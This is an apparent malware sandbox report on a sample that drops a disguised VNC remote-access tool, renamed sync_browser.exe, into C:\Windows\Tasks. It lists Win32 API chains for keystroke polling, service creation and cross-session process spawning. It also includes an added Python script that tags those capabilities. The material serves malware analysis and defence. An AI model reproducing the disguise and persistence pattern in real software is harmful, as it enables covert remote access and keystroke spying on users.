Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50C0650 VkKeyScanA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,GetKeyState,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,MapVirtualKeyA,GetAsyncKeyState,GetAsyncKeyState,CreateThread,CloseHandle,WinExec,MapVirtualKeyA
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50874C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50874C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5082E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E507D560 GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,CreateProcessAsUserA,GetLastError,CloseHandle,CloseHandle,CloseHandle,CloseHandle
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5083550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50834B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5083550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50834B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx
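The "Code function" rows above are the part of the report that actually tells an analyst what the dropped binary can do: each row is a function address followed by the Win32 API chain the sandbox found in it (keyboard-state polling ending in WinExec, SCM open/delete, FindWindowA-to-CreateProcessAsUserA for spawning into the desktop user's session, AdjustTokenPrivileges followed by ExitWindowsEx). Reading hundreds of such rows by hand does not scale, so the script below, an added example and not part of the Joe Sandbox report or of UltraVNC, parses rows in this format and tags each function with a capability when a known API sub-sequence appears in order. The capability rules are the editor's own heuristics, and the sample rows are abridged copies of rows from this report; both are assumptions, not report output.

```python
import re
from collections import OrderedDict

# Editor's triage heuristics (assumption, not from the report): a tag and the ordered
# API sub-sequence that must appear in a function's chain for the tag to apply.
CAPABILITY_RULES = [
    ("keystroke-polling",        ["GetAsyncKeyState", "MapVirtualKeyA"]),
    ("synthetic-keyboard-input", ["keybd_event"]),
    ("service-delete",           ["OpenSCManagerA", "OpenServiceA", "DeleteService"]),
    ("service-create",           ["OpenSCManagerA", "CreateServiceA"]),
    ("spawn-as-desktop-user",    ["FindWindowA", "GetWindowThreadProcessId", "OpenProcess",
                                  "OpenProcessToken", "CreateProcessAsUserA"]),
    ("shutdown-privilege",       ["LookupPrivilegeValueA", "AdjustTokenPrivileges", "ExitWindowsEx"]),
    ("process-enumeration",      ["CreateToolhelp32Snapshot", "Process32First", "Process32Next"]),
    ("command-execution",        ["WinExec"]),
]

# Joe Sandbox function ids look like <pid>_<run>_<hex address>; the id may precede or
# trail the API list depending on how the row was rendered.
ID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]{8,16}$")


def parse_chain(line):
    """Return (function_id, [api, ...]) for one 'Code function' row, or None if absent."""
    marker = "Code function:"
    idx = line.find(marker)
    if idx < 0:
        return None
    tokens = re.split(r"[\s,]+", line[idx + len(marker):].strip())
    ids = [t for t in tokens if ID_RE.match(t)]
    apis = [t for t in tokens if t and not ID_RE.match(t)]
    if not ids:
        return None
    return ids[0], apis


def is_subsequence(needle, hay):
    """True if every element of needle occurs in hay in order (gaps allowed)."""
    it = iter(hay)
    return all(any(api == want for api in it) for want in needle)


def tag_capabilities(apis):
    return [tag for tag, seq in CAPABILITY_RULES if is_subsequence(seq, apis)]


def triage(report_lines):
    """Map function id -> capability tags; functions that trip no rule are dropped."""
    out = OrderedDict()
    for line in report_lines:
        parsed = parse_chain(line)
        if parsed is None:
            continue
        fid, apis = parsed
        for tag in tag_capabilities(apis):
            out.setdefault(fid, [])
            if tag not in out[fid]:
                out[fid].append(tag)
    return out


# Constructed input: rows copied (one of them abridged) from the report above.
SAMPLE_ROWS = [
    r"Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50C0650 VkKeyScanA,GetAsyncKeyState,MapVirtualKeyA,GetKeyState,GetAsyncKeyState,CreateThread,CloseHandle,WinExec,MapVirtualKeyA",
    r"Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50874C0 keybd_event,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event",
    r"Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5082E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle",
    r"Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E507D560 GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,CreateProcessAsUserA,GetLastError,CloseHandle",
    r"Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5083550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx",
    r"Source: C:\Windows\Tasks\sync_browser.exe | Code function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,23_2_00007FF7E5082D00",
    r"Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50D9BC0 LoadLibraryA,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,Process32Next",
]

if __name__ == "__main__":
    for fid, tags in triage(SAMPLE_ROWS).items():
        print(fid, ", ".join(tags))
```

Matching on ordered sub-sequences rather than on single API names keeps the noise down: OpenProcessToken on its own appears in benign code everywhere, but FindWindowA, GetWindowThreadProcessId, OpenProcess, OpenProcessToken and CreateProcessAsUserA in that order is the classic "find the shell, take its token, start a process on the user's desktop" pattern that a service-mode VNC server needs.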
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\5482310161066753
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\CEpr8q.li7XUg
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\GIjul8.QTIrrr
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\gTFLK1.jBd3Ei
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\sdABZ4.E1924R
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\5482310161066753.cmd
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\UltraVNC.ini
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\conhost.exe
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_00405721
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_004139D1
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_00413AAB
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_00413370
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_00413D43
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_0040AD30
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50936D0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50A3E20
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5091620
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5092650
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50C0650
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E509AE70
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50A1660
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E513068C
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5074E80
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E508AD30
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5088590
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5094D7E
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E508C5B0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5096DD1
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5071DD0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5088E10
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E508E610
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E509A870
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E508A890
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E508C090
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5071880
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50870B0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E508C8D0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50820E0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E507A910
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5081100
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5089740
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E512DF80
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5073770
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E508AF60
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E509E780
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E507C810
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5095A33
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5077A1C
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5127250
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E509623E
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5098A70
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5080270
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5072270
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5077A5B
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5073A90
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5077A9A
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5077ACF
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E509C2C0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50E12C0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E509AB10
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5077B04
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E508A130
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5086930
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E509D150
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5075170
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E509F980
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5088980
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50781AD
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E507E1D0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50951B7
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50779E9
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E51309F0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5074200
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E509A420
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50A3460
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5138C90
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5132C70
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50A54A0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50A5CA0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5092CC0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E509DCF0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E507DCF0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50A1CE0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5081D10
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50A0330
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5077B37
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5077B71
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5087B90
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5074390
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E508BB80
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5077BA6
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E509739B
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E508B3D0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5096BBD
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E512E400
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50893E0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5077BE2
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5084C10
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50A3E20
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5091620
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5092650
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50C0650
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E509AE70
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50A1660
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E513068C
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5074E80
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50936D0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E508AD30
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5088590
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5094D7E
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E508C5B0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5096DD1
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5071DD0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5092DF3
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5088E10
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E508E610
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E509A870
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E508A890
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E508C090
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5071880
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50870B0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E508C8D0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50820E0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E507A910
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5081100
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5089740
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E512DF80
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5073770
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E508AF60
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E509E780
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E507C810
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5095A33
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5077A1C
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5127250
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E509623E
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5098A70
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5080270
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5072270
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5077A5B
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5073A90
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5077A9A
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5077ACF
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E509C2C0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50E12C0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E509AB10
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5077B04
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E508A130
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5086930
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E509D150
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5075170
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E509F980
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5088980
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50781AD
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E507E1D0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50951B7
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50779E9
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E51309F0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5074200
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E509A420
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50A3460
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5138C90
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5132C70
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50A54A0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50A5CA0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E509DCF0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E507DCF0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50A1CE0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5081D10
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50A0330
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5077B37
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5077B71
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5087B90
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5074390
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E508BB80
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5077BA6
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E509739B
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E508B3D0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5096BBD
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E512E400
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50893E0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5077BE2
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5084C10
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: String function: 004026B0 appears 38 times
Source: C:\Windows\Tasks\sync_browser.exe | Code function: String function: 00007FF7E50DA3B0 appears 38 times
Source: C:\Windows\Tasks\sync_browser.exe | Code function: String function: 00007FF7E51270B4 appears 56 times
Source: C:\Windows\Tasks\sync_browser.exe | Code function: String function: 00007FF7E5073730 appears 730 times
Source: C:\Windows\Tasks\sync_browser.exe | Code function: String function: 00007FF7E5129500 appears 42 times
Source: C:\Windows\Tasks\sync_browser.exe | Code function: String function: 00007FF7E5127C50 appears 60 times
Source: C:\Windows\Tasks\sync_browser.exe | Code function: String function: 00007FF7E507AE30 appears 34 times
Source: GIjul8.QTIrrr.0.dr | Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: GIjul8.QTIrrr.2.dr | Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: sync_browser.exe.6.dr | Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: Olz7TmvkEW.exe, 00000000.00000003.1297167688.000000000273D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCONHOST.EXEj% vs Olz7TmvkEW.exe
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWinVNC.exe0 vs Olz7TmvkEW.exe
Source: Olz7TmvkEW.exe, 00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWinVNC.exe0 vs Olz7TmvkEW.exe
Source: Olz7TmvkEW.exe, 00000000.00000000.1292984948.000000000041C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebrowser.exe( vs Olz7TmvkEW.exe
Source: Olz7TmvkEW.exe, 00000000.00000002.3170830566.0000000000798000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs Olz7TmvkEW.exe
Source: Olz7TmvkEW.exe, 00000000.00000002.3170830566.0000000000798000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs Olz7TmvkEW.exe
Source: Olz7TmvkEW.exe | Binary or memory string: OriginalFilenamebrowser.exe( vs Olz7TmvkEW.exe
Source: Olz7TmvkEW.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: conhost.exe.6.dr | Binary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp
Source: classification engine | Classification label: mal84.troj.spyw.evad.winEXE@56/60@4/1
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5083550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50818A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50834B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5083550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50818A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50834B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5082D00 OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5082D00 OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
